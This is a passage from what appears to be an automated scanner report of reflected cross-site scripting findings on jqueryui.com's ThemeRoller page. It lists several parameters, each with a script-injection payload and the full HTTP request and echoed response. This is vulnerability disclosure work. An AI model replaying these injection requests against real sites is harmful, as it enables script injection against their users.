ighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

3.41. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f05c"><script>alert(1)</script>260217d18f0 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.42. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0dc"><script>alert(1)</script>0438cc2541 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

3.43. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200d2"><script>alert(1)</script>efe4a57817 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

3.44. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3a8"><script>alert(1)</script>25cc0117949 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hemeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaaff3a8"><script>alert(1)</script>25cc0117949&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e
...[SNIP]...

3.45. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7165b"><script>alert(1)</script>3b4b521d593 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa17165b"><script>alert(1)</script>3b4b521d593&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

3.46. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46bd0"><script>alert(1)</script>574ccf7b54f was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999946bd0"><script>alert(1)</script>574ccf7b54f&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

3.47. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da997"><script>alert(1)</script>393dd978478 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:16:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxda997"><script>alert(1)</script>393dd978478&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.48. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e7ae"><script>alert(1)</script>8978ab3951d was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px3e7ae"><script>alert(1)</script>8978ab3951d" type="text/css" media="all" />
...[SNIP]...

3.49. http://jqueryui.com/themeroller/ [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4728a"><script>alert(1)</script>e4181889fbb was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=2121214728a"><script>alert(1)</script>e4181889fbb&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
